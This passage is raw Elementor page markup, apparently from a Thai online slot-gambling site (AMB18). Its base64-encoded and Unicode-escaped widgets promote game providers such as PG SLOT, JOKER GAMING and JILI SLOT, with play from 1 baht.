2I+PHNwYW4gc3R5bGU9XCJmb250LXdlaWdodDogNDAwO1wiPlx1MGUwNFx1MGUzN1x1MGUyZFx1MGUwMVx1MGUzMlx1MGUyM1x1MGUyM1x1MGUyN1x1MGUxYVx1MGUyM1x1MGUyN1x1MGUyMVx1MGUwNFx1MGU0OFx1MGUzMlx1MGUyMlx1MGU0MFx1MGUwMVx1MGUyMVx1MGUyMlx1MGUyZFx1MGUxNFx1MGUxOVx1MGUzNFx1MGUyMlx1MGUyMVx1MGUwOFx1MGUzMlx1MGUwMVx1MGUxNVx1MGU0OFx1MGUzMlx1MGUwN1x1MGUxYlx1MGUyM1x1MGUzMFx1MGU0MFx1MGUxN1x1MGUyOFx1MGUyMVx1MGUzMlx1MGU0NFx1MGUyN1x1MGU0OVx1MGU0M1x1MGUxOVx1MGUyM1x1MGUzMFx1MGUxYVx1MGUxYVx1MGU0MFx1MGUxNFx1MGUzNVx1MGUyMlx1MGUyN1x1MGUxY1x1MGUzOVx1MGU0OVx1MGU0MFx1MGUyNVx1MGU0OFx1MGUxOVx1MGU0NFx1MGUyMVx1MGU0OFx1MGUxNVx1MGU0OVx1MGUyZFx1MGUwN1x1MGU0MFx1MGUyYVx1MGUzNVx1MGUyMlx1MGU0MFx1MGUyN1x1MGUyNVx1MGUzMlx1MGU0MFx1MGUxYlx1MGUzNFx1MGUxNFx1MGUyYlx1MGUyNVx1MGUzMlx1MGUyMlx1MGU0MFx1MGUyN1x1MGU0N1x1MGUxYVx1MGU0M1x1MGUyYlx1MGU0OVx1MGUyN1x1MGUzOFx1MGU0OFx1MGUxOVx1MGUyN1x1MGUzMlx1MGUyMiBcdTBlNDBcdTBlMWVcdTBlMjNcdTBlMzJcdTBlMzBcdTBlMTdcdTBlMzVcdTBlNDhcdTBlMTlcdTBlMzVcdTBlNDhcdTBlMjNcdTBlMjdcdTBlMjFcdTBlMTdcdTBlMzhcdTBlMDFcdTBlMDRcdTBlNDhcdTBlMzJcdTBlMjJcdTBlMTRcdTBlMzFcdTBlMDdcdTBlMjFcdTBlMzJcdTBlNDNcdTBlMmJcdTBlNDlcdTBlMDRcdTBlMjNcdTBlMWFcdTBlMTdcdTBlMzFcdTBlNDlcdTBlMDdcdTBlMmFcdTBlMzJcdTBlMjJcdTBlMjBcdTBlMzJcdTBlMWVcdTBlMmFcdTBlMjdcdTBlMjIgXHUwZTAxXHUwZTIzXHUwZTMyXHUwZTFmXHUwZTM0XHUwZTAxXHUwZTA4XHUwZTMxXHUwZTE0XHUwZTA4XHUwZTQ5XHUwZTMyXHUwZTE5IFx1MGU0MVx1MGUyNVx1MGUzMFx1MGUyYVx1MGUzMlx1MGUyMlx1MGU0Mlx1MGUxYVx1MGUxOVx1MGUzMVx1MGUyYVx1MGU0MVx1MGUxNVx1MGUwMVx1MGUxNlx1MGUzNVx1MGU0OCBcdTBlMjNcdTBlMzBcdTBlMWFcdTBlMWFcdTBlNDBcdTBlMGJcdTBlMzRcdTBlMjNcdTBlNGNcdTBlMWZcdTBlNDBcdTBlMjdcdTBlMmRcdTBlMjNcdTBlNGNcdTBlNDBcdTBlMmFcdTBlMTZcdTBlMzVcdTBlMjJcdTBlMjNcdTBlMTdcdTBlMzNcdTBlNDNcdTBlMmJcdTBlNDlcdTBlNDBcdTBlMDJcdTBlNDlcdTBlMzJcdTBlNDBcdTBlMDFcdTBlMjFcdTBlNDRcdTBlMTRcdTBlNDlcdTBlMjNcdTBlMjdcdTBlMTRcdTBlNDBcdTBlMjNcdTBlNDdcdTBlMjdcdTBlNDRcdTBlMjFcdTBlNDhcdTBlMTVcdTBlNDlcdTBlMmRcdTBlMDdcdTBlMjNcdTBlMmRcdTBlMTlcdTBlMzJcdTBlMTkgXHUwZTJkXHUwZTM1XHUwZTAxXHUwZTE3XHUwZTMxXHUwZTQ5XHUwZTA3XHUwZTIyXHUwZTMxXHUwZTA3XHUwZTIxXHUwZTM1XHUwZTAxXHUwZTMyXHUwZTIzXHUwZTJkXHUwZTMxXHUwZTFiXHUwZTQwXHUwZTE0XHUwZTE1XHUwZTQwXHUwZTI3XHUwZTJkXHUwZTIzXHUwZTRjXHUwZTBhXHUwZTMxXHUwZTE5XHUwZTQzXHUwZTJiXHUwZTIxXHUwZTQ4XHUwZTE3XHUwZTMxXHUwZTE5XHUwZTE3XHUwZTM1XHUwZTE3XHUwZTM1XHUwZTQ4XHUwZTA0XHUwZTQ4XHUwZTMyXHUwZTIyXHUwZTQwXHUwZTAxXHUwZTIxXHUwZTFiXHUwZTI1XHUwZTQ4XHUwZTJkXHUwZTIyXHUwZTJkXHUwZTJkXHUwZTAxXHUwZTIxXHUwZTMyXHUwZTA4XHUwZTM2XHUwZTA3XHUwZTIxXHUwZTMxXHUwZTQ4XHUwZTE5XHUwZTQzXHUwZTA4XHUwZTQ0XHUwZTE0XHUwZTQ5XHUwZTI3XHUwZTQ4XHUwZTMyXHUwZTFjXHUwZTM5XHUwZTQ5XHUwZTQwXHUwZTI1XHUwZTQ4XHUwZTE5XHUwZTA4XHUwZTMwXHUwZTQ0XHUwZTE0XHUwZTQ5XHUwZTJhXHUwZTMxXHUwZTIxXHUwZTFjXHUwZTMxXHUwZTJhXHUwZTFiXHUwZTIzXHUwZTMwXHUwZTJhXHUwZTFhXHUwZTAxXHUwZTMyXHUwZTIzXHUwZTEzXHUwZTRjXHUwZTI1XHUwZTQ4XHUwZTMyXHUwZTJhXHUwZTM4XHUwZTE0XHUwZTAxXHUwZTQ4XHUwZTJkXHUwZTE5XHUwZTQzXHUwZTA0XHUwZTIzIFx1MGUxZVx1MGUyM1x1MGU0OVx1MGUyZFx1MGUyMVx1MGUyM1x1MGUzMFx1MGUxYVx1MGUxYVx1MGUxZFx1MGUzMlx1MGUwMVx1MGUxNlx1MGUyZFx1MGUxOVx1MGUyZFx1MGUzMVx1MGUxNVx1MGU0Mlx1MGUxOVx1MGUyMVx1MGUzMVx1MGUxNVx1MGUzNFx1MGUxN1x1MGUzNVx1MGU0OFx1MGUwYVx1MGU0OFx1MGUyN1x1MGUyMlx1MGU0M1x1MGUyYlx1MGU0OVx1MGUxYVx1MGUyM1x1MGUzNFx1MGUyYlx1MGUzMlx1MGUyM1x1MGU0MFx1MGUwN1x1MGUzNFx1MGUxOVx1MGUxN1x1MGUzOFx1MGUxOVx1MGU0NFx1MGUxNFx1MGU0OVx1MGUyYVx1MGUzMFx1MGUxNFx1MGUyN1x1MGUwMVx1MGUyM1x1MGUyZFx1MGUwN1x1MGUyM1x1MGUzMVx1MGUxYVx1MGUwMVx1MGUzMlx1MGUyM1x1MGU0MFx1MGUyNVx1MGU0OFx1MGUxOVx1MGUxNVx1MGU0OFx1MGUyZFx1MGU0MFx1MGUxOVx1MGUzN1x1MGU0OFx1MGUyZFx1MGUwN1x1MGU0MVx1MGUxYVx1MGUxYVx1MGU0NFx1MGUyMVx1MGU0OFx1MGUyYVx1MGUzMFx1MGUxNFx1MGUzOFx1MGUxNDxcL3NwYW4+PFwvcD4ifSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoidGV4dC1lZGl0b3IifQ==\\\"][elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6IjkzM2FmY2YiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8aDM+PHNwYW4gc3R5bGU9XCJjb2xvcjogIzk5Y2MwMDtcIj48Yj5cdTBlMDRcdTBlNDhcdTBlMzJcdTBlMjJcdTBlNDBcdTBlMDFcdTBlMjEgUEcgU0xPVDxcL2I+PFwvc3Bhbj48XC9oMz48cD48c3BhbiBzdHlsZT1cImZvbnQtd2VpZ2h0OiA0MDA7XCI+XHUwZTJiXHUwZTE5XHUwZTM2XHUwZTQ4XHUwZTA3XHUwZTQzXHUwZTE5XHUwZTA0XHUwZTQ4XHUwZTMyXHUwZTIyXHUwZTIyXHUwZTJkXHUwZTE0XHUwZTE5XHUwZTM0XHUwZTIyXHUwZTIxXHUwZTE3XHUwZTM1XHUwZTQ4XHUwZTAyXHUwZTMyXHUwZTE0XHUwZTQ0XHUwZTIxXHUwZTQ4XHUwZTQ0XHUwZTE0XHUwZTQ5XHUwZTA0XHUwZTM3XHUwZTJkIFBHIFNMT1QgXHUwZTBiXHUwZTM2XHUwZTQ4XHUwZTA3XHUwZTAyXHUwZTM2XHUwZTQ5XHUwZTE5XHUwZTBhXHUwZTM3XHUwZTQ4XHUwZTJkXHUwZTQwXHUwZTIzXHUwZTM3XHUwZTQ4XHUwZTJkXHUwZTA3XHUwZTAxXHUwZTIzXHUwZTMyXHUwZTFmXHUwZTM0XHUwZTAxXHUwZTA0XHUwZTIxXHUwZTBhXHUwZTMxXHUwZTE0XHUwZTQxXHUwZTI1XHUwZTMwXHUwZTQwXHUwZTJkXHUwZTFmXHUwZTQwXHUwZTFmXHUwZTAxXHUwZTE1XHUwZTRjXHUwZTJkXHUwZTI1XHUwZTMxXHUwZTA3XHUwZTAxXHUwZTMyXHUwZTIzIFx1MGU0MFx1MGUwMVx1MGUyMVx1MGUyYVx1MGU0OFx1MGUyN1x1MGUxOVx1MGU0M1x1MGUyYlx1MGUwZFx1MGU0OFx1MGUyMVx1MGUzNVx1MGUxZlx1MGUzNVx1MGU0MFx1MGUwOFx1MGUyZFx1MGUyM1x1MGU0Y1x1MGUxZlx1MGUyM1x1MGUzNVx1MGUyYVx1MGUxYlx1MGUzNFx1MGUxOVx1MGU0MVx1MGUyNVx1MGUzMFx1MGUxNVx1MGUzMVx1MGUyN1x1MGUwNFx1MGUzOVx1MGUxM1x1MGUyM1x1MGUzMlx1MGUwN1x1MGUyN1x1MGUzMVx1MGUyNVx1MGUxN1x1MGUzNVx1MGU0OFx1MGUwMVx1MGUyM1x1MGUzMFx1MGUxNVx1MGUzOFx1MGU0OVx1MGUxOVx1MGUwNFx1MGUyN1x1MGUzMlx1MGUyMVx1MGUxNVx1MGUzN1x1MGU0OFx1MGUxOVx1MGU0MFx1MGUxNVx1MGU0OVx1MGUxOVx1MGUxN1x1MGUzOFx1MGUwMVx1MGUwNFx1MGUyM1x1MGUzMVx1MGU0OVx1MGUwN1x1MGUxN1x1MGUzNVx1MGU0OFx1MGUyYlx1MGUyMVx1MGUzOFx1MGUxOSBcdTBlMjdcdTBlMDdcdTBlMjVcdTBlNDlcdTBlMmRcdTBlMTZcdTBlMzlcdTBlMDFcdTBlMmRcdTBlMmRcdTBlMDFcdTBlNDFcdTBlMWFcdTBlMWFcdTBlNDNcdTBlMmJcdTBlNDlcdTBlNDBcdTBlMDJcdTBlNDlcdTBlMzJcdTBlNDNcdTBlMDhcdTBlMDdcdTBlNDhcdTBlMzJcdTBlMjIgXHUwZTQwXHUwZTJiXHUwZTIxXHUwZTMyXHUwZTMwXHUwZTAxXHUwZTMxXHUwZTFhXHUwZTE3XHUwZTMxXHUwZTQ5XHUwZTA3XHUwZTIxXHUwZTM3XHUwZTJkXHUwZTQzXHUwZTJiXHUwZTIxXHUwZTQ4XHUwZTQxXHUwZTI1XHUwZTMwXHUwZTJhXHUwZTMyXHUwZTIyXHUwZTQwXHUwZTAxXHUwZTQ3XHUwZTFhXHUwZTAxXHUwZTMzXHUwZTQ0XHUwZTIzIFx1MGUyZFx1MGUzNVx1MGUwMVx1MGUxN1x1MGUzMVx1MGU0OVx1MGUwN1x1MGUyMlx1MGUzMVx1MGUwN1x1MGUyMVx1MGUzNVx1MGUyZFx1MGUzMVx1MGUxNVx1MGUyM1x1MGUzMlx1MGUwMVx1MGUzMlx1MGUyM1x1MGUwOFx1MGU0OFx1MGUzMlx1MGUyMlx1MGUxN1x1MGUzNVx1MGU0OFx1MGUyYVx1MGUyMVx1MGUxNFx1MGUzOFx1MGUyNSBcdTBlMTdcdTBlMzNcdTBlNDNcdTBlMmJcdTBlNDlcdTBlMWNcdTBlMzlcdTBlNDlcdTBlNDBcdTBlMjVcdTBlNDhcdTBlMTlcdTBlMjNcdTBlMzlcdTBlNDlcdTBlMmFcdTBlMzZcdTBlMDFcdTBlMTZcdTBlMzZcdTBlMDdcdTBlNDJcdTBlMmRcdTBlMDFcdTBlMzJcdTBlMmFcdTBlNDNcdTBlMTlcdTBlMDFcdTBlMzJcdTBlMjNcdTBlMTdcdTBlMzNcdTBlMDFcdTBlMzNcdTBlNDRcdTBlMjNcdTBlNDRcdTBlMTRcdTBlNDlcdTBlMDhcdTBlMjNcdTBlMzRcdTBlMDdcdTBlMDFcdTBlMzJcdTBlMjNcdTBlMTdcdTBlMzVcdTBlNDhcdTBlMTdcdTBlMzJcdTBlMDdcdTBlNDBcdTBlMjdcdTBlNDdcdTBlMWFcdTBlMTlcdTBlMzNcdTBlNDBcdTBlMDJcdTBlNDlcdTBlMzJcdTBlNDBcdTBlMDFcdTBlMjFcdTBlMDhcdTBlMzJcdTBlMDFcdTBlMDRcdTBlNDhcdTBlMzJcdTBlMjJcdTBlMTlcdTBlMzVcdTBlNDlcdTBlNDFcdTBlMWFcdTBlMWFcdTBlMjVcdTBlMzRcdTBlMDJcdTBlMmFcdTBlMzRcdTBlMTdcdTBlMThcdTBlMzRcdTBlNGNcdTBlNDFcdTBlMTdcdTBlNDlcdTBlMDhcdTBlMzZcdTBlMDdcdTBlMGFcdTBlNDhcdTBlMjdcdTBlMjJcdTBlNDBcdTBlMWVcdTBlMzRcdTBlNDhcdTBlMjFcdTBlMDRcdTBlMjdcdTBlMzJcdTBlMjFcdTBlMjFcdTBlMzFcdTBlNDhcdTBlMTlcdTBlNDNcdTBlMDhcdTBlNDNcdTBlMTlcdTBlMDRcdTBlMzhcdTBlMTNcdTBlMjBcdTBlMzJcdTBlMWVcdTBlNDFcdTBlMjVcdTBlMzBcdTBlMTdcdTBlMzNcdTBlNDNcdTBlMmJcdTBlNDlcdTBlMTdcdTBlMzhcdTBlMDFcdTBlMDFcdTBlMzJcdTBlMjNcdTBlMmFcdTBlMWJcdTBlMzRcdTBlMTlcdTBlNDBcdTBlMTVcdTBlNDdcdTBlMjFcdTBlNDRcdTBlMWJcdTBlMTRcdTBlNDlcdTBlMjdcdTBlMjJcdTBlMWVcdTBlMjVcdTBlMzFcdTBlMDdcdTBlMDRcdTBlMjdcdTBlMzJcdTBlMjFcdTBlMjFcdTBlMzFcdTBlMTlcdTBlNDFcdTBlMWFcdTBlMWFcdTBlMjFcdTBlMzdcdTBlMmRcdTBlMmRcdTBlMzJcdTBlMGFcdTBlMzVcdTBlMWU8XC9zcGFuPjxcL3A+PGgzPjxzcGFuIHN0eWxlPVwiY29sb3I6ICM5OWNjMDA7XCI+PGI+XHUwZTA0XHUwZTQ4XHUwZTMyXHUwZTIyXHUwZTQwXHUwZTAxXHUwZTIxIEpPS0VSIEdBTUlORzxcL2I+PFwvc3Bhbj48XC9oMz48cD48c3BhbiBzdHlsZT1cImZvbnQtd2VpZ2h0OiA0MDA7XCI+Sk9LRVIgR0FNSU5HIFx1MGU0MFx1MGUxYlx1MGU0N1x1MGUxOVx1MGUyZFx1MGUzNVx1MGUwMVx1MGUwNFx1MGU0OFx1MGUzMlx1MGUyMlx1MGUxN1x1MGUzNVx1MGU0OFx1MGUyYVx1MGUzMlx1MGUyMlx1MGUyYVx1MGUyNVx1MGU0N1x1MGUyZFx1MGUxNVx1MGUyM1x1MGUzOVx1MGU0OVx1MGUwOFx1MGUzMVx1MGUwMVx1MGUwMVx1MGUzMVx1MGUxOVx1MGUxNFx1MGUzNVx1MGU0M1x1MGUxOVx1MGU0MFx1MGUyM1x1MGUzN1x1MGU0OFx1MGUyZFx1MGUwN1x1MGU0MFx1MGUwMVx1MGUyMVx1MGU0MVx1MGUxNVx1MGUwMVx1MGUwN1x1MGU0OFx1MGUzMlx1MGUyMlx1MGU0MVx1MGUyNVx1MGUzMFx1MGUyMVx1MGUzNVx1MGU0Mlx1MGUxYVx1MGUxOVx1MGUzMVx1MGUyYVx1MGUyYlx1MGUyNVx1MGUzMlx1MGUwMVx1MGUyYlx1MGUyNVx1MGUzMlx1MGUyMiBcdTBlMDhcdTBlMzhcdTBlMTRcdTBlNDBcdTBlMTRcdTBlNDhcdTBlMTlcdTBlMmRcdTBlMjJcdTBlMzlcdTBlNDhcdTBlMTdcdTBlMzVcdTBlNDhcdTBlMThcdTBlMzVcdTBlMjFcdTBlNDBcdTBlMDFcdTBlMjFcdTBlMTdcdTBlMzVcdTBlNDhcdTBlMmJcdTBlMjVcdTBlMzJcdTBlMDFcdTBlMmJcdTBlMjVcdTBlMzJcdTBlMjJcdTBlMTVcdTBlMzFcdTBlNDlcdTBlMDdcdTBlNDFcdTBlMTVcdTBlNDhcdTBlNDFcdTBlMTlcdTBlMjdcdTBlNDBcdTBlMmRcdTBlNDBcdTBlMGFcdTBlMzVcdTBlMjJcdTBlNDRcdTBlMWJcdTBlMDhcdTBlMTlcdTBlMTZcdTBlMzZcdTBlMDdcdTBlMTVcdTBlMzBcdTBlMjdcdTBlMzFcdTBlMTlcdTBlMTVcdTBlMDFcdTBlMTdcdTBlMzNcdTBlNDNcdTBlMmJcdTBlNDlcdTBlMWNcdTBlMzlcdTBlNDlcdTBlNDBcdTBlMjVcdTBlNDhcdTBlMTlcdTBlNDBcdTBlMjVcdTBlMzdcdTBlMmRcdTBlMDFcdTBlMmFcdTBlMTlcdTBlMzhcdTBlMDFcdTBlNDRcdTBlMTRcdTBlNDlcdTBlMTVcdTBlMzJcdTBlMjFcdTBlMmFcdTBlNDRcdTBlMTVcdTBlMjVcdTBlNGNcdTBlMTVcdTBlMTlcdTBlNDBcdTBlMmRcdTBlMDcgXHUwZTIzXHUwZTMwXHUwZTFhXHUwZTFhXHUwZTQwXHUwZTAxXHUwZTIxXHUwZTE2XHUwZTM5XHUwZTAxXHUwZTFlXHUwZTMxXHUwZTEyXHUwZTE5XHUwZTMyXHUwZTQzXHUwZTJiXHUwZTQ5XHUwZTIzXHUwZTJkXHUwZTA3XHUwZTIzXHUwZTMxXHUwZTFhXHUwZTAxXHUwZTMyXHUwZTIzXHUwZTQwXHUwZTI1XHUwZTQ4XHUwZTE5XHUwZTFhXHUwZTE5XHUwZTIxXHUwZTM3XHUwZTJkXHUwZTE2XHUwZTM3XHUwZTJkXHUwZTQ0XHUwZTE0XHUwZTQ5XHUwZTJkXHUwZTIyXHUwZTQ4XHUwZTMyXHUwZTA3XHUwZTIxXHUwZTM1XHUwZTFiXHUwZTIzXHUwZTMwXHUwZTJhXHUwZTM0XHUwZTE3XHUwZTE4XHUwZTM0XHUwZTIwXHUwZTMyXHUwZTFlIFx1MGUyMFx1MGUzMlx1MGUxZVx1MGU0NFx1MGUyMVx1MGU0OFx1MGUwMVx1MGUyM1x1MGUzMFx1MGUxNVx1MGUzOFx1MGUwMSBcdTBlNDBcdTBlMmFcdTBlMzVcdTBlMjJcdTBlMDdcdTBlMGFcdTBlMzFcdTBlMTRcdTBlNDBcdTBlMDhcdTBlMTkgXHUwZTAxXHUwZTMyXHUwZTIzXHUwZTE3XHUwZTM1XHUwZTQ4XHUwZTE3XHUwZTMyXHUwZTA3XHUwZTQwXHUwZTI3XHUwZTQ3XHUwZTFhXHUwZTE0XHUwZTM2XHUwZTA3XHUwZTQwXHUwZTAxXHUwZTIxXHUwZTA4XHUwZTMyXHUwZTAxXHUwZTA0XHUwZTQ4XHUwZTMyXHUwZTIyXHUwZTE5XHUwZTM1XHUwZTQ5XHUwZTQwXHUwZTAyXHUwZTQ5XHUwZTMyXHUwZTIxXHUwZTMyXHUwZTQwXHUwZTJhXHUwZTIzXHUwZTM0XHUwZTIxXHUwZTE3XHUwZTMxXHUwZTFlIFx1MGUwOFx1MGUzNlx1MGUwN1x1MGUxN1x1MGUzM1x1MGU0M1x1MGUyYlx1MGU0OVx1MGU0MVx1MGUxZVx1MGUyNVx1MGUxNVx1MGUxZlx1MGUyZFx1MGUyM1x1MGU0Y1x1MGUyMVx1MGUyMVx1MGUzNVx1MGUwNFx1MGUyN1x1MGUzMlx1MGUyMVx1MGUwNFx1MGUyM1x1MGUxYVx1MGU0MFx1MGUwNFx1MGUyM1x1MGUzN1x1MGU0OFx1MGUyZFx1MGUwN1x1MGUyMVx1MGUzMlx1MGUwMVx1MGUwMlx1MGUzNlx1MGU0OVx1MGUxOSBcdTBlNDBcdTBlMmJcdTBlMjFcdTBlMzJcdTBlMzBcdTBlMmFcdTBlMzNcdTBlMmJcdTBlMjNcdTBlMzFcdTBlMWFcdTBlMDRcdTBlMTlcdTBlMTdcdTBlMzVcdTBlNDhcdTBlMTVcdTBlNDlcdTBlMmRcdTBlMDdcdTBlMDFcdTBlMzJcdTBlMjNcdTBlMjVcdTBlMzhcdTBlNDlcdTBlMTlcdTBlMDFcdTBlMzNcdTBlNDRcdTBlMjNcdTBlNDFcdTBlMWFcdTBlMWFcdTBlMTVcdTBlNDhcdTBlMmRcdTBlNDBcdTBlMTlcdTBlMzdcdTBlNDhcdTBlMmRcdTBlMDdcdTBlNDNcdTBlMTlcdTBlMWFcdTBlMjNcdTBlMjNcdTBlMjJcdTBlMzJcdTBlMDFcdTBlMzJcdTBlMjhcdTBlMTdcdTBlMzVcdTBlNDhcdTBlNDBcdTBlMjNcdTBlNDlcdTBlMzJcdTBlNDNcdTBlMDg8XC9zcGFuPjxcL3A+PGgzPjxzcGFuIHN0eWxlPVwiY29sb3I6ICM5OWNjMDA7XCI+PGI+XHUwZTA0XHUwZTQ4XHUwZTMyXHUwZTIyXHUwZTQwXHUwZTAxXHUwZTIxIEpJTEkgU0xPVDxcL2I+PFwvc3Bhbj48XC9oMz48cD48c3BhbiBzdHlsZT1cImZvbnQtd2VpZ2h0OiA0MDA7XCI+SklMSSBTTE9UIFx1MGU0Mlx1MGUxNFx1MGUxNFx1MGU0MFx1MGUxNFx1MGU0OFx1MGUxOVx1MGU0M1x1MGUxOVx1MGU0MFx1MGUyM1x1MGUzN1x1MGU0OFx1MGUyZFx1MGUwN1x1MGUwMVx1MGUzMlx1MGUyM1x1MGUyZFx1MGUyZFx1MGUwMVx1MGU0MVx1MGUxYVx1MGUxYVx1MGU0MFx1MGUwMVx1MGUyMVx1MGUxN1x1MGUzNVx1MGU0OFx1MGU0MFx1MGUxOVx1MGU0OVx1MGUxOVx1MGUwNFx1MGUyN1x1MGUzMlx1MGUyMVx1MGU0MVx1MGUxYlx1MGUyNVx1MGUwMVx1MGU0M1x1MGUyYlx1MGUyMVx1MGU0OFx1MGU0MVx1MGUyNVx1MGUzMFx1MGUxZlx1MGUzNVx1MGU0MFx1MGUwOFx1MGUyZFx1MGUyM1x1MGU0Y1x1MGUxZVx1MGUzNFx1MGU0MFx1MGUyOFx1MGUyOVx1MGUyYlx1MGUyNVx1MGUzMlx1MGUwMVx1MGUyYlx1MGUyNVx1MGUzMlx1MGUyMiBcdTBlMmJcdTBlMjVcdTBlMzJcdTBlMjJcdTBlNDBcdTBlMDFcdTBlMjFcdTBlMjFcdTBlMzVcdTBlMjNcdTBlMzBcdTBlMWFcdTBlMWFcdTBlNDJcdTBlMWFcdTBlMTlcdTBlMzFcdTBlMmFcdTBlMGJcdTBlNDlcdTBlMmRcdTBlMTlcdTBlNDJcdTBlMWFcdTBlMTlcdTBlMzFcdTBlMmFcdTBlMTdcdTBlMzVcdTBlNDhcdTBlNDBcdTBlMWVcdTBlMzRcdTBlNDhcdTBlMjFcdTBlNDJcdTBlMmRcdTBlMDFcdTBlMzJcdTBlMmFcdTBlMjNcdTBlMzFcdTBlMWFcdTBlMjNcdTBlMzJcdTBlMDdcdTBlMjdcdTBlMzFcdTBlMjVcdTBlNDFcdTBlMWFcdTBlMWFcdTBlMDRcdTBlMzJcdTBlMTRcdTBlNDRcdTBlMjFcdTBlNDhcdTBlMTZcdTBlMzZcdTBlMDcgXHUwZTIwXHUwZTMyXHUwZTFlXHUwZTAxXHUwZTIzXHUwZTMyXHUwZTFmXHUwZTM0XHUwZTAxXHUwZTE3XHUwZTMxXHUwZTE5XHUwZTJhXHUwZTIxXHUwZTMxXHUwZTIyIFx1MGU0Mlx1MGUxN1x1MGUxOVx1MGUyYVx1MGUzNVx1MGUyYVx1MGUxNFx1MGU0M1x1MGUyYSBcdTBlMTRcdTBlMzZcdTBlMDdcdTBlMTRcdTBlMzlcdTBlMTRcdTBlMmFcdTBlMzJcdTBlMjJcdTBlMTVcdTBlMzIgXHUwZTE3XHUwZTMzXHUwZTQzXHUwZTJiXHUwZTQ5XHUwZTAxXHUwZTMyXHUwZTIzXHUwZTQwXHUwZTI1XHUwZTQ4XHUwZTE5XHUwZTQ0XHUwZTIxXHUwZTQ4XHUwZTE5XHUwZTQ4XHUwZTMyXHUwZTQwXHUwZTFhXHUwZTM3XHUwZTQ4XHUwZTJkIFx1MGUxOVx1MGUyZFx1MGUwMVx1MGUwOFx1MGUzMlx1MGUwMVx1MGUxOVx1MGUzNVx1MGU0OVx1MGUyMlx1MGUzMVx1MGUwN1x1MGUyMVx1MGUzNVx1MGUyM1x1MGUzMFx1MGUxYVx1MGUxYVx1MGUxN1x1MGUxNFx1MGUyNVx1MGUyZFx1MGUwN1x1MGU0MFx1MGUyNVx1MGU0OFx1MGUxOVx1MGU0M1x1MGUyYlx1MGU0OVx1MGUxY1x1MGUzOVx1MGU0OVx1MGU0MFx1MGUyNVx1MGU0OFx1MGUxOVx1MGUyOFx1MGUzNlx1MGUwMVx1MGUyOVx1MGUzMlx1MGU0MVx1MGUxOVx1MGUyN1x1MGUxN1x1MGUzMlx1MGUwN1x1MGUwMVx1MGU0OFx1MGUyZFx1MGUxOVx1MGUyNVx1MGUwN1x1MGU0MFx1MGUwN1x1MGUzNFx1MGUxOVx1MGUwOFx1MGUyM1x1MGUzNFx1MGUwN1x1MDBhMDxcL3NwYW4+PFwvcD4ifSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoidGV4dC1lZGl0b3IifQ==\\\"]\\t\\t<div class=\\\"elementor-element elementor-element-cbf6885 elementor-widget elementor-widget-image\\\" data-id=\\\"cbf6885\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img width=\\\"1200\\\" height=\\\"500\\\" src=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-1-1.webp\\\" class=\\\"attachment-full size-full wp-image-351\\\" alt=\\\"\\\" srcset=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-1-1.webp 1200w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-1-1-300x125.webp 300w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-1-1-1024x427.webp 1024w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-1-1-768x320.webp 768w\\\" sizes=\\\"(max-width: 1200px) 100vw, 1200px\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-ff86a53 elementor-widget elementor-widget-heading\\\" data-id=\\\"ff86a53\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"heading.default\\\">\\n\\t\\t\\t\\t\\t<h2 class=\\\"elementor-heading-title elementor-size-default\\\"> AMB18 \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e21\\u0e49\\u0e21\\u0e35\\u0e07\\u0e1a\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n<\\/h2>\\t\\t\\t\\t<\\/div>\\n\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6IjU1ZTgwYmIiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cD48c3BhbiBzdHlsZT1cImZvbnQtd2VpZ2h0OiA0MDA7XCI+XHUwZTJhXHUwZTMzXHUwZTJiXHUwZTIzXHUwZTMxXHUwZTFhXHUwZTA0XHUwZTE5XHUwZTE3XHUwZTM1XHUwZTQ4XHUwZTIxXHUwZTM1XHUwZTA3XHUwZTFhXHUwZTA4XHUwZTMzXHUwZTAxXHUwZTMxXHUwZTE0XHUwZTQzXHUwZTE5XHUwZTAxXHUwZTMyXHUwZTIzXHUwZTQwXHUwZTAyXHUwZTQ5XHUwZTMyXHUwZTQwXHUwZTI1XHUwZTQ4XHUwZTE5XHUwZTQxXHUwZTE5XHUwZTQ4XHUwZTE5XHUwZTJkXHUwZTE5XHUwZTI3XHUwZTQ4XHUwZTMyXHUwZTJhXHUwZTFiXHUwZTM0XHUwZTE5XHUwZTIxXHUwZTMxXHUwZTE5XHUwZTJhXHUwZTRjXHUwZTQxXHUwZTIxXHUwZTQ5XHUwZTIxXHUwZTM1XHUwZTA3XHUwZTFhXHUwZTA4XHUwZTMzXHUwZTAxXHUwZTMxXHUwZTE0IFx1MGUxN1x1MGUzOFx1MGUxOVx1MGUxOVx1MGU0OVx1MGUyZFx1MGUyMlx1MGUwMVx1MGU0N1x1MGU0MFx1MGUyNVx1MGU0OFx1MGUxOVx1M